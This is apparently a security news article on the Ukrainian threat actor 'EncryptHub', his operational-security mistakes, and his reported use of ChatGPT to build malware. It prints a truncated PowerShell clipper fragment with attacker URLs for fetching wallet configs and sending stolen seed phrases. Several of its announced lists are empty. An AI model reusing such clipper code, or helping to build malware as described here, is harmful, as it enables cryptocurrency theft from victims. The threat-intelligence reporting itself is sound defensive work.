Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
In a remarkable turn of events that highlights both the evolving tactics of modern cybercriminals and the fundamental importance of operational security, a Ukrainian threat actor operating under the alias “EncryptHub” has been exposed after a series of operational security failures and unconventional use of AI tools.
This case presents a fascinating study in how even technically proficient attackers can be undone by basic OPSEC mistakes, while simultaneously showcasing how AI tools like ChatGPT are increasingly being leveraged to develop sophisticated malware.
According to research from Outpost24’s KrakenLabs team, EncryptHub is a Ukrainian cybercriminal who fled his hometown approximately a decade ago. Since early 2024, he has been orchestrating increasingly sophisticated ransomware campaigns targeting organizations worldwide with custom-built malware designed to steal cryptocurrency and sensitive information.
What makes this threat actor particularly interesting is the dichotomy of his activities. While conducting malicious campaigns, he simultaneously contributed to legitimate security research, even receiving acknowledgment from Microsoft Security Response Center for discovering CVE-2025-24071 and CVE-2025-24061.
This dual nature is reminiscent of patterns we’ve seen with other threat actors who oscillate between legitimate security research and cybercrime, similar to the behaviors documented in the Emotet operators before they fully committed to criminal activities.
Despite technical sophistication in malware development, EncryptHub made a catastrophic series of operational security failures that ultimately led to their unmasking:
Source: Security researchers’ analysis of EncryptHub case, Outpost24’s KrakenLabs, 2024
The initial breakthrough came when KrakenLabs researchers discovered an exposed JSON configuration file on EncryptHub’s command and control server. This file contained Telegram bot information that provided investigators with a digital trail leading directly to the threat actor’s activities.
Perhaps the most fascinating aspect of this case is EncryptHub’s extensive reliance on ChatGPT as a “partner in crime.” The AI assistant was leveraged to create nearly every component of his malicious infrastructure:
Source: Analysis of recovered ChatGPT conversation logs, Outpost24 KrakenLabs, 2024
In one particularly revealing conversation, EncryptHub asked the AI to evaluate whether he was better suited to be a “black hat or white hat” hacker, even confessing to criminal activities and exploits he had developed.
The clipper malware developed with ChatGPT’s assistance represents one of EncryptHub’s primary attack vectors. This PowerShell-based malware was designed to monitor clipboards for cryptocurrency wallet addresses and replace them with attacker-controlled alternatives – a technique similar to what we’ve observed in TrickBot campaigns targeting financial institutions.
The code demonstrates how the malware loads wallet configurations from a remote server and operates continuously to intercept transactions:
# URL API для получения конфига и отправки сид-фраз $serverConfigUrl = "https:// dmin/clipper/config" $serverSendSeedUrl = "https: /admin/clipper/send_seed" # Функция получения публичного IP function Get-PublicIP { try { $response = Invoke-RestMethod -Uri "https://api64.ipify.org?format=json" -Errc return $response .ip |
The EncryptHub case highlights a growing trend where AI tools serve as both a weapon for cybercriminals and a tool for defenders. While AI can help automate security tasks and identify threats, it can also be misused to create more sophisticated attack vectors.
Source: Industry analysis on AI usage in cybersecurity, based on Microsoft research, 2023
According to a Microsoft Security report, there’s an emerging “AI cybercrime economy” where threat actors use large language models to:
What’s particularly concerning is that these AI-assisted attacks often combine traditional techniques with new capabilities, making them potentially more dangerous than conventional threats. For example, the cryptocurrency clipboard hijacking technique used by EncryptHub has been observed in previous campaigns, but AI assistance allowed for more sophisticated code that could better evade detection.
This technology-driven evolution of malware is also evident in other ransomware families. While EncryptHub used AI-assisted development to create sophisticated attacks, more established criminal groups are taking different approaches. For instance, LockBit 4.0 Ransomware represents the culmination of years of traditional ransomware development, completely rewritten in Rust for improved performance, with multi-threaded encryption capabilities that make it particularly devastating to organizations without proper defenses.
Organizations should be on alert for the following indicators associated with EncryptHub:
This attack methodology shows similarities to Dofoil trojan campaigns, which also focused on cryptocurrency theft through sophisticated system manipulation.
The EncryptHub case offers valuable lessons for cybersecurity professionals:
The EncryptHub case represents a preview of what cybersecurity professionals will increasingly face in the coming years: technically sophisticated attacks assisted by AI, deployed by threat actors who may simultaneously operate in both legitimate and criminal spheres.
While new tools like AI assistants create powerful capabilities for attackers, the fundamentals of cybersecurity and investigation remain unchanged. Basic OPSEC mistakes still undo even the most technically proficient adversaries, reinforcing the importance of security fundamentals for both attackers and defenders.
As cybercriminals continue to embrace AI tools, security teams must adapt their detection and prevention strategies accordingly, while remaining vigilant for the human errors that often provide the critical breakthrough in exposing malicious activities.